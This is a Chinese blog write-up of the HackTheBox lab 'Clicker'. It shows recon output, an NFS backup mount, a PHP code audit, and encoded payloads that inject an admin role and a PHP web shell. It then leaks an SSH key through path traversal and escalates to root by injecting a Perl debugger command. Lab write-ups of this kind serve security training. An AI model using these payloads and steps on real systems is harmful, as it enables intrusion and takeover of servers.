Clicker - Linux

最新推荐文章于 2024-11-15 22:25:12 发布
最新推荐文章于 2024-11-15 22:25:12 发布
阅读量557 收藏 7
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136760434
版权
文章描述了对IP地址10.10.11.232的网络扫描结果,发现了多个开放端口和服务,包括OpenSSH、HTTP、RPC等,并揭示了网站Clicker中的漏洞,如ArbitraryFileWrite、POST扩展利用及环境变量攻击。涉及的漏洞包括登录注册安全和文件操作权限问题。
摘要由CSDN通过智能技术生成

Recon

> echo 10.10.11.232 > ip

> rustscan -b 4500 -a './ip' --ulimit 5000 -- -A -sC -Pn
Open 10.10.11.232:22
Open 10.10.11.232:80
Open 10.10.11.232:111
Open 10.10.11.232:2049
Open 10.10.11.232:37459
Open 10.10.11.232:37827
Open 10.10.11.232:40781
Open 10.10.11.232:59915
Open 10.10.11.232:60457

PORT      STATE SERVICE  REASON  VERSION
22/tcp    open  ssh      syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO8nDXVOrF/vxCNHYMVULY8wShEwVH5Hy3Bs9s9o/WCwsV52AV5K8pMvcQ9E7JzxrXkUOgIV4I+8hI0iNLGXTVY=
|   256 b4da8daf659cbbf071d51350edd81130 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjDCjag/Rh72Z4zXCLADSXbGjSPTH8LtkbgATATvbzv
80/tcp    open  http     syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Clicker - The Game
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35547/udp6  mountd
|   100005  1,2,3      42486/udp   mountd
|   100005  1,2,3      55195/tcp6  mountd
|   100005  1,2,3      60457/tcp   mountd
|   100021  1,3,4      35753/udp6  nlockmgr
|   100021  1,3,4      37827/tcp   nlockmgr
|   100021  1,3,4      41853/tcp6  nlockmgr
|   100021  1,3,4      49691/udp   nlockmgr
|   100024  1          42143/tcp6  status
|   100024  1          50743/udp6  status
|   100024  1          55162/udp   status
|   100024  1          59915/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs_acl  syn-ack 3 (RPC #100227)
37459/tcp open  mountd   syn-ack 1-3 (RPC #100005)
37827/tcp open  nlockmgr syn-ack 1-4 (RPC #100021)
40781/tcp open  mountd   syn-ack 1-3 (RPC #100005)
59915/tcp open  status   syn-ack 1 (RPC #100024)
60457/tcp open  mountd   syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 2049

┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Clicker]
└─$ cd /mnt                                                                                         
┌──(kali㉿kali)-[/mnt]
└─$ sudo mkdir backups

┌──(kali㉿kali)-[/mnt]
└─$ sudo mount -t nfs 10.10.11.232:/mnt/backups /mnt/backups -o nolock 

┌──(kali㉿kali)-[/mnt]
└─$ ls backups 
clicker.htb_backup.zip

┌──(kali㉿kali)-[/mnt]
└─$ cp /mnt/backups/clicker.htb_backup.zip ~/WorkSpace/Hackthebox/Clicker

代码审计

功能点

  • 登录
  • 注册
  • 保存游戏数据
    ![[Pasted image 20230924183752.png]]

其中在 save_game 中会从 GET 请求中获取参数
save_game.php

<?php
session_start();
include_once("db_utils.php");

if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
	$args = [];
	foreach($_GET as $key=>$value) {
		if (strtolower($key) === 'role') {
			// prevent malicious users to modify role
			header('Location: /index.php?err=Malicious activity detected!');
			die;
		}
		$args[$key] = $value;
	}
	save_profile($_SESSION['PLAYER'], $_GET);
	// update session info
	$_SESSION['CLICKS'] = $_GET['clicks'];
	$_SESSION['LEVEL'] = $_GET['level'];
	header('Location: /index.php?msg=Game has been saved!');
	
}
?>

Arbitrary file write

post extension

export.php

<?php
session_start();
include_once("db_utils.php");

if ($_SESSION["ROLE"] != "Admin") {
  header('Location: /index.php');
  die;
}

function random_string($length) {
    $key = '';
    $keys = array_merge(range(0, 9), range('a', 'z'));

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key;
}

$threshold = 1000000;
if (isset($_POST["threshold"]) && is_numeric($_POST["threshold"])) {
    $threshold = $_POST["threshold"];
}
$data = get_top_players($threshold);
$currentplayer = get_current_player($_SESSION["PLAYER"]);
$s = "";
if ($_POST["extension"] == "txt") {
    $s .= "Nickname: ". $currentplayer["nickname"] . " Clicks: " . $currentplayer["clicks"] . " Level: " . $currentplayer["level"] . "\n";
    foreach ($data as $player) {
    $s .= "Nickname: ". $player["nickname"] . " Clicks: " . $player["clicks"] . " Level: " . $player["level"] . "\n";
  }
} elseif ($_POST["extension"] == "json") {
  $s .= json_encode($currentplayer);
  $s .= json_encode($data);
} else {
  $s .= '<table>';
  $s .= '<thead>';
  $s .= '  <tr>';
  $s .= '    <th scope="col">Nickname</th>';
  $s .= '    <th scope="col">Clicks</th>';
  $s .= '    <th scope="col">Level</th>';
  $s .= '  </tr>';
  $s .= '</thead>';
  $s .= '<tbody>';
  $s .= '  <tr>';
  $s .= '    <th scope="row">' . $currentplayer["nickname"] . '</th>';
  $s .= '    <td>' . $currentplayer["clicks"] . '</td>';
  $s .= '    <td>' . $currentplayer["level"] . '</td>';
  $s .= '  </tr>';

  foreach ($data as $player) {
    $s .= '  <tr>';
    $s .= '    <th scope="row">' . $player["nickname"] . '</th>';
    $s .= '    <td>' . $player["clicks"] . '</td>'; 
    $s .= '    <td>' . $player["level"] . '</td>';
    $s .= '  </tr>';
  }
  $s .= '</tbody>';
  $s .= '</table>';
} 

$filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
file_put_contents($filename, $s);
header('Location: /admin.php?msg=Data has been saved in ' . $filename);
?>

63 -> $filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
Auth bypass with PHP type Juggling - CYBERNETGEN

clicks=1&level=1&%72%6f%6c%65%3d%22%41%64%6d%69%6e%22%23

nickname=%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%30%5d%29%3b%3f%3e%22%23

export.php

POST extension=php

execute_query

当选择非 1,2,3,4 时候,dest 可控,接着将 /home/jack/queries/ 路径与 dest 拼接赋值为 name,access 判断是否可读,可以读就会与name 拼接 /usr/bin/mysql -u clicker_db_user --password='clicker_db_password' clicker -v < 可控处
![[Pasted image 20230924200959.png]]

执行命令

www-data@clicker:/opt/manage$ ./execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
...[snip]...
-----END OPENSSH PRIVATE KEY---
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1

id_rsa 中需要注意格式,补全 --

ROOT

jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh

#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi

Hacking with Environment Variables

执行,此时 /bin/bash 已经拥有 s 权限位

jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("chmod u+s /bin/bash");' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
jack@clicker:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

切换至 ROOT

jack@clicker:~$ /bin/bash -p
bash-5.1# cat /root/r*
3f58c6611dbc02dad2da3d5e0f77d7e6
赛博雨天
关注
AutoClicker - Max Auto Clicker:免费下载Max Auto Clicker,Mouse AutoClicker Robot-开源
05-26
经过测试且100%可正常运行的Max Auto Clicker是高效的跨平台应用程序,因此可用于MS Windows和Linux操作系统。 Max Auto Clicker具有简单易用的界面,易于安装和配置:您可以选择设置鼠标按钮:左键单击,右键单击...
Max Auto Clicker:免费下载 Max Auto Clicker, Mouse AutoClicker Robot-开源
06-22
经过测试且 100% 有效,Max Auto Clicker 是一个高效的跨平台应用程序,因此可用于 Microsoft Windows 和 Linux 操作系统。 Max Auto Clicker 具有简单且用户友好的界面,并且易于安装和配置:您可以选择设置鼠标...
Broxa-Clicker:Broxa Clicker开源
02-11
5. 兼容性:Broxa-Clicker可能兼容多种操作系统,如Windows、MacOS和Linux,适应不同用户的需求。 三、使用Broxa-Clicker的步骤 1. 下载与安装:首先,你需要从Broxa-Clicker的官方仓库或第三方源获取最新版本的...
Linux】多线程(中)
Eristic0618的博客
11-14 1029
本篇文章围绕Linux中的多线程展开讲解,包含线程互斥的概念、互斥量mutex和相关API、互斥量原理、重入和线程安全、死锁、线程同步和条件变量等内容
操作系统实验:在linux下用c语言模拟进程调度算法程序
最新发布
m0_68165821的博客
11-15 504
进程每执行一次,进程需要的时间片数减1、该进程的优先数减3。进程执行时,每运行一个时间片,进程还需要的时间片数减1,运行进程占用处理机的时间片数加1,然后比较占用CPU的时间片数是否与该进程的轮转时间片数相等,若相等则说明已达到轮转时间,应将现运行的进程排列就绪队列的末尾,调度队列上的首进程运行,且改变它们的进程状态,直至所有进程完成各自的时间片。(4)为了清楚地观察每个进程的调度过程,程序应将每个时间片内的进程的情况显示出来,包括正在运行的进程,处于就绪队列中的进程和处于阻塞队列中的进程。
SimpleScreenRecorder, a screen recording tool for Linux
likecayon的博客
11-11 368
【代码】SimpleScreenRecorder, a screen recording tool for Linux
gdb编译教程(支持linux下X86和ARM架构)
weixin_43246170的博客
11-12 250
5、我们先开始x86版本,这个比较简单,不需要配置交叉编译工具(当然前提是系统装了gcc和g++的环境啊)。将gdb文件拷贝到对应平台下,即可使用。(或者使用gdbserver远程调试)以上这些配置都是要跟在./configure后面的。3、解压,然后进入到目录下,打开当前目录的命令行窗口。2、下载完后拷贝到linux的x86系统。先清理下编译x86残留下的临时文件。6、限制我们来编译ARM版本。4、创建一个生成目录。我下载的8.2版本。
初识Linux · 信号保存
更新各种计算机技能~
11-15 785
前文我们已经介绍了信号产生,在时间的学习线上,信号的学习分为预备知识,信号产生,信号保存,信号处理,本文我们学习信号保存,在前言部分,我们介绍几个信号保存中的概念。信号递达:实际执行信号的处理动作。信号未决:信号从产生到递达之间的状态。对于信号产生之后,在递达的这个过程,成为未决,就像老师给你布置了作业,你接受到了做作业的这个信号,但是因为贪玩,不想做,这个状态,就是未决。
linux逻辑卷练习
feng68_的博客
11-15 214
从新硬盘制作三个分区每个分区都 3GB大小, 将三个分区只作为物理卷,通过这三个物理卷创建卷组 通过卷组生成一个逻辑卷,大小为7G,再将逻辑卷调整到10G。物理卷(physical volume):简称PV。逻辑卷(logical volume):简称LV。卷组(Volume Group):简称VG。
linux怎么查看网络带宽命令
欢迎你们到来,希望能帮到大家
11-15 19
linux怎么查看网络带宽命令,工具的安装以及使用。
连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器,使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
aha_xigua的博客
11-12 390
现在你已经成功创建并激活了一个新的conda环境。如果返回了版本信息,说明conda已经安装。如果没有安装,你需要先安装conda。创建一个新的conda环境。在你的个人计算机上打开终端(命令行界面)。输入密码后,你将成功连接到实验室服务器。三、利用conda创建环境。
Linux ssh 基础教程
tangPHP的博客
11-13 856
SSH是一种安全协议,用作远程连接Linux服务器的主要手段。它通过生成远程shell提供基于文本的界面。连接之后,在本地终端中键入的所有命令都将发送到远程服务器并在那里执行,一般说ssh即openssh。OpenSSH(Open Secure Shell),是一套安全的网络工具,它在不安全的网络上提供加密通信。它主要用于安全远程登录、文件传输和其他安全网络服务。
redis linux 安装
qq_40691438的博客
11-15 155
将 Redis 配置为绑定到 0.0.0.0 可以使其监听所有网络接口,从而允许从任何网络接口连接到 Redis 服务器。这通常用于在生产环境中允许多个客户端从不同的网络连接到 Redis。然而,这样做会暴露 Redis 服务器,因此必须确保有适当的安全措施。(我的是centos-stream-8)要搞密码,不然容易被攻击。
Linux】I2C tools
目标:MVP
11-15 198
i2c tool是一个开源工具,需要自行下载进行交叉编译,但是我们的SDK好像自带了该工具代码,所以在开发板中可以直接使用。该命令用于探测i2c总线。表示探测i2c4总线上的设备。注意,该命令检测出来的地址是7位地址。
QEMU 模拟器中运行的 Linux 系统
usstmiracle的博客
11-14 184
**作用**:它包含了 Linux 系统的根文件系统(root filesystem),包括所有的系统文件、库、应用程序和配置文件。- **作用**:它包含了 Linux 内核,负责启动和管理操作系统的核心功能。如果你有更多问题或需要进一步的帮助,随时告诉我!- **linux-aarch64-qemu-bzImage**:压缩的 Linux 内核镜像,负责启动和管理操作系统。- **linux-aarch64-qemu.ext4**:根文件系统镜像,包含系统文件和应用程序。
Linux自定义终端提示符
Lenn Louis' Scribe
11-13 732
序列 显示值\a\d\h\H\j\l\n\r\s\t\T\@\A\u\v\V\w\W\#\$\[\]
13. Linux上CUDA的安装
K2SO4的博客
11-15 813
Linux的CUDA安装教程
linux】(11)进程命令-kill
游码客的博客
11-15 149
kill命令是 Unix 和 Linux 系统中用于发送信号给进程的工具。尽管名字叫 “kill”,但它不仅用于终止进程,还可以发送各种信号来控制进程的行为。
Linux——基础io
2301_80687320的博客
11-14 675
学习了linux了一段时间我们知道了linux系统下一切皆为文件,那么接下来我们就要对文件增删查改进行操作了。一、io是什么?在计算机系统中,IO处理包括与外部设备(如键盘、鼠标、打印机等)的数据交换。IO处理方式有多种,包括中断处理、DMA(直接存储器存取)等方式。中断处理方式下,CPU可以在外设准备好数据后中断当前任务,处理外设请求,然后再继续之前的任务。DMA方式则通过专门的控制器管理内存与外设之间的数据交流,减少CPU的介入,提高效率。在学习c语言和c++时,我们也经常听说io流。
AutoClicker-master:自动化鼠标点击软件使用教程
根据描述,AutoClicker-master的代码应该是开源的,这意味着开发者和用户可以自由地查看和修改源代码。开源的优势在于透明度高,社区可以共同参与改进和优化程序。因此,对于IT专业人士或者有一定编程基础的用户来说...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值